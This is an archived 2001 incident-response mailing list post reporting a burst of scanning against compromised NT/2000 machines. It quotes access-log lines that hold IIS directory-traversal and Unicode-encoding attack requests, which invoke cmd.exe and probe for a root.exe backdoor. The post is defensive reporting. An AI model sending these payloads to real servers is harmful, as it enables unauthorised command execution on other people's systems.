Rekindled sploit scanning?

From: Aj Effin Reznor (ajat_private)
Date: Tue Sep 18 2001 - 07:08:04 PDT

Next message: Mark Challender: "RE: Concept Virus(CV) V.5 - Advisory and Quick analysis"

Previous message: VanMeter, John: "New Worm or Attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Looks like a fair amount of traffic this morning amongst compromised NT/2k boxen.

the 63.x.y.z as well as the 65.x.y.z is seeing a fair amount of traffic, similar to the following:



aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 383 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333"-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404350 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350"-" "-"


log times are PST.


-aj.



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Mark Challender: "RE: Concept Virus(CV) V.5 - Advisory and Quick analysis"
Previous message: VanMeter, John: "New Worm or Attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:00:58 PDT